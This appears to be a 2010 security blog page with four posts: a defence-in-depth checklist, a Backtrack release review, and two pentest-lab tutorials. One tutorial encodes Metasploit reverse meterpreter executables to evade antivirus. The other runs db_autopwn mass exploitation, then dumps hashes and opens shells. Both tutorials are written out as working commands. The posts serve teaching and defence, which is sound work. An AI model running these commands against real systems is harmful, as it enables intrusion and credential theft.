Saturday, 28 August 2010

CISSP Defence in depth: How to protect the IT Systems in a corporate network

This is a big subject, and the detail could easily fill several books. Here I am going to discuss (very briefly) some of the ingredients that should be used to protect most corporate networks.

Some of these get forgotten about, so, "Calling all Sysadmins and Security Managers!" - worth checking this list to see if you have these appropriate controls.

People enforcing Security
The first thing you need is reliable and trustworthy people in the IT Security team.
These people need a good understanding of the risks and vulnerabilities.

I would also say, that one of the most important attributes is that these inforcers of security need to be process-driven. A lot of the ingredients outlined below are repetitive processes and procedures, checks and balances. Some of them are boring after a while, (backups and patch management for example) but thoroughness and attention to detail are key.

Physical Security
This is the second thing you need. If you don't have security in the physical world, it doesn't matter how many processes, procedures, and technical controls you put in place. No point deploying all the things we discuss below if criminals can simply walk in off the street and walk out with your server under their arm, or if a fire burns down your building because your extinguisers don't work, or you didn't detect the fire.

Review your physical security. If you were a criminal, how would you steal some of the companies equipment or data? What disasters could happen, what would be the impact and what controls can be put in place for reasonable cost?

Key things to think about:
  • Building Access Control
  • IT area Access Control
  • Laptops, iPhones/Blackberry theft
  • Fire, flood, hurricanes, earthquakes, pestilence and plague
  • Power outages

Laptop encryption
Though a technical control, I would consider laptop hard-disk encryption as part of your physical controls. What you are protecting the data from, is the situation of someone having physical access to a stolen laptop. If you don't have HDD encryption, gaining access to the data on a laptop is trivial.

Operating system login controls do NOT protect the data on the hard-disk from being accessed. If you want to protect the data on laptops you must have hard-disk encryption.

This is fundamental data security. If you don't have effective and USEABLE backups of your data, you basically don't have any data security.

Think that all data and systems are transient and temporary, and every piece of hardware will fail eventually. Also, upgrades, configuration changes, and user errors, can easily wipe-out your precious data.

These days, a vast amount of the "value" of a company is in the data they hold. Many companies would fail as a business if their IT systems were not available for a week.

Regularly review and test your backups, and have reliable off-site storage for your data.
Also remember that, just because you can recover files from a tape, does not mean it will be quick, easy, or even possible to get that data back into your live systems.

I have had experience of situations, where backup data was on tape, but it was not possible to recover into the live environment, because of the time involved, or because of complex database replication issues. Bear these issues in mind, and practise data recovery.

Documentation and change control
These often get forgotten about or done poorly, especially in small to medium businesses. If you don't have documentation, how are you going to put things back together "WHEN" they break? Is your documentation secure, structured, backed-up and stored off-site?

Change control is there to help the documentation update process, and protect you from breaking your own systems.

Additionally this helps to communicate changes to extended teams and end-users. You don't have to have full ITIL processes, but you do need appropriate processes to offer the correct level of protection for your business.

Do the appropriate level of change control. This will often be a little more than you feel you have time to do, but do it anyway because it will save time in the long run.

This is the cornerstone of logical security on the network. Rules need to be regularly reviewed. Portscanning and network scanning should be performed to ensure that the ruleset is correctly enforced, and that there are no accidental loop-holes or inappropriate access.

Don't forget that outbound rules are just as important as inbound rules, especially since the increase in client-side attacks over recent years.

It is as important to protect your DMZs and backend systems from the outside, as it is to protect them from potentially compromised systems on the LAN.

All systems should have appropriate virus protection.

Are the AV definitions up-to-date on all your systems? If not, then this protection is not effective, and arguably useless.

Choose a good vendor, as there are vast differences in the regularity of updates, and the scope of protection. Some of the largest IT Security vendors have products that are surprisingly weak. Review third-party comparisions and choose appropriately.

Email and Web content filtering proxies
These are the biggest and fastest vectors for malware and virus infection. Choose good solutions, and update your policies regularly.

Block executable code on Email and Web proxies, because viruses WILL get through. Most virus and malware detection is signature-based, which means that it cannot be detected until it has already been seen in the wild.

That in turn means that, somewhere in the world, systems have already been infected hours before the Anti-virus companies can offer detection signatures to their customers. If you get new malware before the signatures are published, your AV-tool will offer you no protection at all. Block exes on your proxies.

Patch Control
This is often a problem area for many companies. It is timeconsuming for IT Departments, can introduce new problems, and is largely hidden from the rest of the business as a "benefit".

However, the risks are high, and unpatched systems are easily compromised by attackers and viruses.

Regularly patch both operating systems and applications. Put in place a regular patch management program, and produce metrics to monitor how up-to-date your systems are.

Don't just rely on WSUS to tell you that your systems are up-to-date, scan your subnets with a vulnerabilty scanner, and don't forget about non-Microsoft systems.

Don't forget about applications on Servers or Clients. Out-of-date client software, such as old versions of Microsoft Office or Adobe Acrobat Reader can be big weaknesses.

Vulnerability scanning
This assists your patch management and configuration management processes.

You may think you have all your systems up-to-date, but unless you have done some vulnerability scanning and analysis, you are probably wrong.

Vulnerability scanners can be expensive, but they can also be free (openVAS for example). Regularly scan your systems, and review the scans to remove false positives and act when systems have real vulnerabilities.

Intrusion detection
Detecting attacks, in both the physical and logical world are important.

This may not be a standalone system. It may be built into your corporate firewall, or firewalls on individual systems, or part of your Antivirus tool.
I would recommend deploying dedicated intrusion detection in many cases. This can be done relatively cheaply (with something like snort).

Review logs and alerts, as there is no point spending money and time setting up monitoring systems if you don't do anything about it when alerts happen.

Remove false positives from your monitoring so that the logs and alerts are usable.

Friday, 27 August 2010

Hacking techniques: Using msfencode to obscure a "trojan" meterpreter shellcode executable from Anti-virus tools

Why are we doing this?
There are a lot of interesting and useful features to play with in the Metasploit meterpreter payload, especially with the extensible scripts.

While I was experimenting with meterpreter sessions, I found it easier and quicker to use a prebuilt Windows PE executeable of a reverse meterpreter payload.

I would recommend producing and using one of these in your testlab, as this enables you to simulate the pwnage of a vulnerable application on a fully patched system. This is helpful as it enables you to get familiar with meterpreter features and post-exploitation techniques; such as hashdumping, information gathering, further network enumeration, tunneling techniques, and secondary attacks - in an easily reproduceable way.

Please only use these methods for testing and educational purposes. I do not advocate breaking the law or attacking systems where you do not have permission.

Making testing easier
Producing a meterpreter executable payload is relatively easy, but I initially found that this executable was easily detected by the Anti-virus on my test Windows system. So we also discuss encoding this executeable multiple times using msfencode. In the following examples I am using Backtrack 4 R1.

Producing a meterpreter executeable
To produce an example executeable, you can use msfpayload as follows:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > /var/www/met.exe

Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=,LPORT=4444

ls -l /var/www/met.exe

-rw-r--r-- 1 root root 73802 Aug 20 19:00 /var/www/met.exe

I tried downloading this to my test "victim" system, and is was immediately detected by the desktop Anti-virus tool, and quarantined as a "trojan" - understandable, but I want to do some testing without disabling my security features. (I don't want to get any real viruses or trojans ;o)

Encoding the payload
So, lets try encoding it using msfencode. We need to produce the payload in raw format, and then pipe this to msfencode which will produce the executeable:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -t exe > /var/www/metenc1.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

I downloaded this to my target system, but nope, still detected by my Anti-virus tool.

Further encoding
Let's get some help:

./msfencode -h

    Usage: ./msfencode


    -a   The architecture to encode as
    -b   The list of characters to avoid: '\x00\xff'
    -c   The number of times to encode the data
    -e   The encoder to use
    -h        Help banner
    -i   Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m   Specifies an additional module search path
    -n        Dump encoder information
    -o   The output file
    -p   The platform to encode for
    -s   The maximum size of the encoded data
    -t   The format to display the encoded buffer with (c, elf, exe, java, js_le, js_be, perl, raw, ruby, vba, vbs, loop-vbs, asp, war, macho)
    -x   Specify an alternate win32 executable template

Using the -c option, msfencode enables you to repeat the encoding process recursively multiple times. Let's go crazy, encode it 21 times, and see what happens:

./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -c 21 -t exe > /var/www/metenc21.exe
[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

... truncated for your sanity ...

[*] x86/shikata_ga_nai succeeded with size 804 (iteration=21)

In my tests, this payload didn't get detected, it runs fine, and so I was able to use it for what I wanted in my test environment. Just needed to start msfconsole, setup a handler to catch the session, and then double-click the meterpreter executable on the "victim" desktop. Easy.

So how much encoding is required to get past the average AV-tool?
However, I was a bit curious about this (as I always am). I like to know how things work, and where the limitations are.

So how about building a whole batch of these babies, each with a different number of encoding iterations, and seeing which ones get detected and which don't. Time for a bash one-liner:

for num in $(seq 1 20); do ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 R | ./msfencode -c $num -t exe > /var/www/metenc$num.exe; done

So, then I had a whole army of 20 encoded reverse meterpreter payload exes, so I put some of them to the test with an online scanner that can scan against 40+ Anti-virus tools.

Here are my results for some of the encodings, with the number of tools detecting our reverse meterpreter exe payload as a backdoor/trojan

Native exe payload = 14/42 AV tools detected it

That seems very low to me, as for some examples of the encoded ones:

1 encoding = 3/42 AV tools
2 encodings = 8/42 AV tools
5 encodings = 6/42 AV tools
10 encodings = 8/42 AV tools
15 encodings = 8/42 AV tools
18 encodings = 7/42 AV tools
20 encodings = 1/42 AV tools = AVG

The results seem very variable, but I guess this is to be expected, as each encoding is somewhat randomized, and my submissions were not previously known in the hash database.

For these tests, I declare AVG the winner! as it outperformed the other tools.

AhnLab-V3, AntiVir, Antiy-AVL, CAT-QuickHeal, ClamAV, Comodo, DrWeb, eSafe, eTrust-Vet, Fortinet, Jiangmin, Kaspersky, McAfee, McAfee-GW-Edition, Panda, PCTools, Prevx, Rising, Sophos, Sunbelt, SUPERAntiSpyware, Symantec, TheHacker, TrendMicro, TrendMicro-HouseCall, VBA32, ViRobot, VirusBuster... In these tests for some reason you FAIL!

So, it just goes to show, that for a known functionality payload, produced by a very well known tool (Metasploit) ; backdoor/trojan detection is suprisingly poor!

  • Never rely on Anti-virus alone - use defence in depth
  • Content security solutions should block exe code in web and email traffic, even if it is not a known virus it could easily be custom malware

My first tests of Backtrack 4 R1

On the 5th of August 2010 I was very happy to see an email notification from the Backtrack team, telling me that Backtrack 4 R1, their latest ethical hacking and penetration testing toolset, was released. (This is the kind of email I like!)

Backtrack has been around for over 4 years, and has got to be the best and most widely used hacking platform, with 100's of tools, and various development environments preinstalled, configured and ready-to-go out of the box.

This updated version 4 release is great news, as we can see that the Backtrack team are working well and striving to improve what is already a great toolset. There seems to be significant investment of effort in the platform, so I hope this open-source project will continue to flourish for considerable time to come.

Downloads of the previous release, Backtrack 4, topped over 1 million over the first six months, and this new release has already seen significant download traffic.

You can find the download for Backtrack 4 R1 at the following location, and it is available in both ISO image (for a DVD) and VMware formats

So far, I've only done a dual boot hard drive install on this system (BT4, and BT4 R1) and they seem to run fine side-by-side. The installation was very straight-forward, and basically the same as BT4, i.e. cut a DVD, boot from that, and run the setup script on the desktop.

What has changed?
On initial install and bootup there don't seem to be any significant changes to the way things work, or how the tools are laid out, which is good, as I am already very happy with BT4.

Flux support has been added, though having used BT4 for some time now, I will probably stick with KDE (most of what I do is on the commandline anyway).

Improved driver support
One personal bonus, that I have quickly seen for me, is that the wifi drivers for my Dell mini 10v are now supported out of the box. I was struggling to get these to work with BT4, and this means I don't need to always carry around an extra dongle. Great!

Updates and tool improvements
Signature updates for various tools have been applied, so this saves a couple of hours, running various updates, for any new installs you have.

Other things of note
  • Dragon configurator
  • Updated Social Engineering Toolkit
  • Updated and sexier Maltego 3.0
  • Metasploit 3.4.2

Other than than, not much to say really...

Backtrack 3 is not dead yet
As a side note, though BT4R1 looks great, I will continue to keep archives of the old versions in my disc collection which can be handy sometimes.

For example, I had an issue not so long ago where I went back to Backtrack 3 for an awkward task.

We had a problem with a server that nobody knew the login credentials for. It was a fairly old system, and it only had a CD drive. We could not boot it from either a USB stick or external DVD drive, for various reasons, so we were unable use BT4.

To cut a long story short, we wipped out a BT3 CD, booted from that, and had the Windows Administrator hash cracked in around an hour, giving us the access we needed. So there is life in the old dog yet ;o)

Be good.

Tuesday, 17 August 2010

Mass Pwnage: Hacking with Metasploit db_autopwn and reverse meterpreter payloads

Metasploit is a powerful exploitation framework and can be used to scan and attack multiple systems in an automated way. Here we look at some basic examples of using the Metasploit db_autopwn feature.

These techniques can be used to scan networks by identifying real exploitable vulnerabilites on-mass. Patch-management and proper configuration are usually the cures for most of these vulnerabilities, but having knowledge of where the exploitable vulnerabilites are in a network is the first step to help focus your efforts in the most needy areas.

Also, knowing the power that an attacker can wield with such tools can help raise the priority of IT Security in risk assessment, especially when reporting to managment, so that the correct resources can be applied to reduce risks.

Please be good and do not abuse these techniques to attack systems where you don't have express permission. These techniques can easily cause denial of service, and should only be used for pentesting and educational purposes.

We will be using Backtrack 4 R1 in these examples, as Metasploit and Mysql are already installed and preconfigured.

We are going to be logging our information to a database, so let's start Mysql first:

/etc/init.d/mysql start
netstat -antp |grep 3306

tcp        0      0*               LISTEN      5852/mysqld

That's Mysql running ok, now let's start Metasploit:
cd /pentest/exploits/framework3/

                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |

       =[ metasploit v3.4.2-dev [core:3.4 api:1.0]
+ -- --=[ 575 exploits - 290 auxiliary
+ -- --=[ 212 payloads - 27 encoders - 8 nops
       =[ svn r9959 updated 8 days ago (2010.08.05)

Warning: This copy of the Metasploit Framework was last updated 8 days ago.
         We recommend that you update the framework at least every other day.
         For information on updating your copy of Metasploit, please see:


First we will select a database driver, in this case we are using Mysql

db_driver mysql

Basic db_autopwn pwnage
In the first example we will create a new database called mytest1 using our mysql credentials, connect to it, and scan a single machine using nmap. Then we will run all the vulnerabilites that match the open ports that are found:

db_connect root:toor@mytest1
db_autopwn -p -t -e -r

The db_autopwn options in this example will match exploits to open ports (-p) show the exploits to be run (-t) run the exploits (-e) and connect back using a reverse meterpreter payload (-e).

This may take several minutes to run, based on the number and types of open ports. HTTP ports can take a long time, due to the large number of available exploits included in Metasploit for the well known HTTP ports. Let the exploitation complete (it may take 10mins+ depending on your connectivity to the victim system)

If any exploits are successful, a list of active sessions to the victim machine will be shown. We have a reverse meterpreter session and we can interact with it as follows:

sessions -l

Active sessions

  Id  Type         Information                    Connection
  --  ----         -----------                    ----------
  1   meterpreter  TEST-DESKTOP\Ben @ TEST-DESKTOP ->

sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Once we connect to the session further attacks and analysis can proceed as follows:

1) Obtaining the password hashes:

use priv
Loading extension priv...success.


2) Uploading and downloading files:

upload /var/www/plink.exe c:\\
[*] uploading  : /var/www/plink.exe -> c:\
[*] uploaded   : /var/www/plink.exe -> c:\\plink.exe

download c:\\windows\\system32\\drivers\\etc\\hosts /root/hosts
[*] downloading: c:\windows\system32\drivers\etc\hosts -> /root/hosts
[*] downloaded : c:\windows\system32\drivers\etc\hosts -> /root/hosts

3) Gaining a shell:

Process 2640 created.
Channel 3 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>

IP address range exploitation
Attacking multiple machines is where the power of db_autopwn really comes into effect.

Lets scan, and attempt to exploit, a whole subnet in a new database

db_driver mysql
db_connect root:toor@mysubnet1

Now let's look at the systems we have data on:



address        address6  arch  comm  comments  created_at                    info  mac                name            os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------        --------  ----  ----  --------  ----------                    ----  ---                ----            ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------                                  Tue Aug 17 12:51:56 UTC 2010        00:0E:50:EC:B2:A6  speedtouch.lan                                               alive  Tue Aug 17 12:51:56 UTC 2010  5     0      default                                   Tue Aug 17 13:22:14 UTC 2010        00:22:3F:E9:89:FF  test_system.lan                                                alive  Tue Aug 17 13:22:14 UTC 2010  4     0      default

Again, an exploitation of the scanned machines could be run as follows:

db_autopwn -p -t -e -r

However, depending on the number of machines found, running this exploitation may take considerable time.

Additionally, in a live pentest, exploiting many systems at once can cause denial of service headaches on multiple systems. This can be mitigated by focusing the exploitation on particular ports, or particular ranges of machines, and working through the network gradually, logging vulnerabilities in our database as we go.

The exploitation can be focused by; IP address range:

db_autopwn -p -t -e -r -I

..or by port:

db_autopwn -p -t -e -r -PI 445

.. or both:

db_autopwn -p -t -e -r -PI 445 -I

For large numbers of vulnerable machines, this makes the exploitation and analysis more manageable, especially on production networks where live services may be affected and need to be restarted.

What have we found?
We exploited multiple vulnerabilities in several systems, gained access, and "did stuff", but which vulnerabilities did we exploit on these systems?

You can interrogate the list of successful exploitations by running the following command in Metasploit:


Alternatively, we can go and have a poke around in the mysql database directly, with the following sequence of commands:

mysql -u root -ptoor

Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 35
Server version: 5.0.67-0ubuntu6 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> show databases;
| Database           |
| information_schema |
| mysql              |
| mysubnet1          |
7 rows in set (0.36 sec)

mysql> use mysubnet1;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
| Tables_in_mysubnet1 |
| clients             |
| events              |
| hosts               |
| loots               |
| notes               |
| refs                |
| reports             |
| schema_migrations   |
| services            |
| tasks               |
| users               |
| vulns               |
| vulns_refs          |
| wmap_requests       |
| wmap_targets        |
| workspaces          |
16 rows in set (0.00 sec)

mysql> select * from vulns;

We have completed our basic pentest on our subnet, and identified some vulnerable hosts. We know exactly which ones, and what needs to be fixed.

Take a bow for a round of applause, time for a teabreak ...and that was a basic guide on db_autopwn

These threats are best mitigated using an IT Security program which includes:
  • Multiple layers (defense in depth)
  • Secure application development/deployment
  • Applying recommended safe configurations
  • Patch management and software upgrades
  • Vulnerability scanning and remediation